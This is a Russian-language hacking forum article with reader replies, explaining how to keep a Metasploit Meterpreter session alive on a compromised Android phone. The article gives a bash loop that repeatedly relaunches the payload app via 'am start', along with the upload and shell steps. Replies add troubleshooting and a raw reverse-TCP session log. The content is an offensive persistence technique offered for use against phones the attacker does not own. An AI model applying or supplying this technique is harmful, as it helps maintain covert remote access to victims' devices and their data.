Статья Закрепление в системе Android

С первым днём весны! Сегодня покажу как закрепиться в системе андроид. Скрипт будет работать до перезагрузки!. Наверняка у всех такое было, когда умирает сессия при пропадании соединения, и нет возможности запустить её снова, и успеть сделать все дела.
Нам необходимо создать полезную нагрузку, создали. Далее запускаем листенер в метасплоите, получили сессию. Приступим.
Теперь нам необходимо узнать в какой мы директории.
Команда pwd
2.png

Сейчас нам нужно найти ту директорию, в которую мы сможем загрузить наш скрипт. Так как у нас нету рута, и мы не можем загрузить его в системную директорию.
Для этого нам нужно перейти во внутреннюю память телефона или же на карту памяти.
В моём случае командой.
cd /sdcard/
3.png

Сейчас нам требуется отредактировать наш bash скрипт
Код: 
#!/bin/bash
while :
do am start --user 0 -a android.intent.action.MAIN -n com.omnttopjcg.wpzfylbays/.MainActivity
sleep 20
done
Строчку com.omnttopjcg.wpzfylbays вы должны заменить на свою. Получили мы её командой pwd
После того как заменили текст, сохраняем наш скрипт, и загружаем командой upload , и указываем директорию к нашему скрипту или же просто перетащим его с нашёго рабочего стола в консоль. Загрузили.
Заходим в shell. Команда
shell
И запускаем наш скрипт.
sh *название вашего скрипта* *
3.png

Для того чтобы скрипт сработал, нам необходимо подождать 1 минуту. "Обязательно!" Тут главно не передержать, а иначе всё испортим..
Прошло 2,5, нам необходимо остановить наш скрипт сочетанием клавиш "Ctrl+c". И подтверждаем закрытие Y
Готово. Сессия будет прилетать даже при плохом соединении. Нам нужно лишь снова написать команду exploit. Для того чтобы понять как это работает, необходимо протестировать на своём устройстве.
 

Вложения

  • 1.png
    1.png
    34,5 КБ · Просмотры: 505
  • Нравится
Реакции: mz111, Fftfmmm, Tihon49 и ещё 14
Нажмите, чтобы раскрыть...
kot-gor

kot-gor

Well-known member
07.09.2016
529
705
BIT
0
добрый день.. может знаете как можно сделать с перезагрузкой?
 
Rollly

Rollly

Green Team
31.12.2017
109
133
BIT
0
kot-gor сказал(а):
добрый день.. может знаете как можно сделать с перезагрузкой?
Нажмите, чтобы раскрыть...
Еще не полностью изучил эту тему, но думаю нет ничего невозможного, если будут какие-то открытия в этой теме, сразу же напишу статью.
 
  • Нравится
Реакции: Ondrik8 и kot-gor
S

SopilqaD

Rollly сказал(а):
Еще не полностью изучил эту тему, но думаю нет ничего невозможного, если будут какие-то открытия в этой теме, сразу же напишу статью.
Нажмите, чтобы раскрыть...
Держи, может тему напишешь .
Ссылка скрыта от гостей
 
H

HighGnome

Здравствуйте. Собрал payload с оригинальным апк. Вот ошибка при запуске шелла.
sh getroot.sh
Starting: Intent { act=android.intent.action.MAIN cmp=com.metasploit.stage/.MainActivity }
Error type 3
Гуглил, так и не нашел решения. Возможно есть другие решения закрепления в системе андроид?
 
A

Agent Smith 007

добрый день
помогите пожалуйста решить проблему, хотел закрепиться в системе андроид
делал все по инструкции, однако после перезагрузки сессия не установилась, при попытке запустить ее заново открывает и закрывает сессии одну за другой. Удалил файл с bash скриптом (теперь уже не помню как он назывался) , переустановил эмулятор, загрузил Кали с резервного сохранения, все ровно при загрузке полезной нагрузки с тем же ip и портом ( LHOST 192.168.0.105 LPORT 3210 ) сессии начинают открываться и закрываться одна за другой. пробовал с другим эмулятором на том же порту и ip все тоже самое.
вот что выводит
[*] Started reverse TCP handler on 192.168.0.105:2301
[*] Sending stage (72435 bytes) to 192.168.0.100
[*] Meterpreter session 22 opened (192.168.0.105:3210 -> 192.168.0.100:62558) at 2019-07-15 10:17:47 +0300
[*] 192.168.0.100 - Meterpreter session 22 closed. Reason: Died
[*] Sending stage (72435 bytes) to 192.168.0.100
[*] Meterpreter session 23 opened (192.168.0.105:3210 -> 192.168.0.100:62591) at 2019-07-15 10:17:57 +0300
[*] Sending stage (72435 bytes) to 192.168.0.100
[*] 192.168.0.100 - Meterpreter session 23 closed. Reason: Died
[*] Meterpreter session 24 opened (192.168.0.105:3210 -> 192.168.0.100:62634) at 2019-07-15 10:18:07 +0300
[*] Sending stage (72435 bytes) to 192.168.0.100
[*] 192.168.0.100 - Meterpreter session 24 closed. Reason: Died
 
  • Нравится
Реакции: Ondrik8
Ondrik8

Ondrik8

prodigy
Green Team
08.11.2016
1 129
3 188
BIT
0
Честно сам что въехать не могу.. четко на стороне клиента срабатывает... Если что отпишусь из опыта сам чекну и отпишусь обещаю
 
  • Нравится
Реакции: Agent Smith 007
A

Agent Smith 007

Ondrik8 сказал(а):
Честно сам что въехать не могу.. четко на стороне клиента срабатывает... Если что отпишусь из опыта сам чекну и отпишусь обещаю
Нажмите, чтобы раскрыть...
Заметил что ip виртуальной машины стал статическим, после перезагрузок и выключения не меняется. Я пробовал присоединиться к эмулятору с другого устройства и с другим ip 192.168.0.104 но тем же портом и произошло то же самое, как я понял проблема с портом, потому что и 192.168.0.104 и 192.168.0.105 с другим портом работают нормально.
 
V

varab495

New member
07.05.2020
3
0
BIT
0
HighGnome сказал(а):
Здравствуйте. Собрал payload с оригинальным апк. Вот ошибка при запуске шелла.
sh getroot.sh
Starting: Intent { act=android.intent.action.MAIN cmp=com.metasploit.stage/.MainActivity }
Error type 3
Гуглил, так и не нашел решения. Возможно есть другие решения закрепления в системе андроид?
Нажмите, чтобы раскрыть...
Nashli reshenie?
 
Для ответа нужно войти/зарегистрироваться
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!

Верх Низ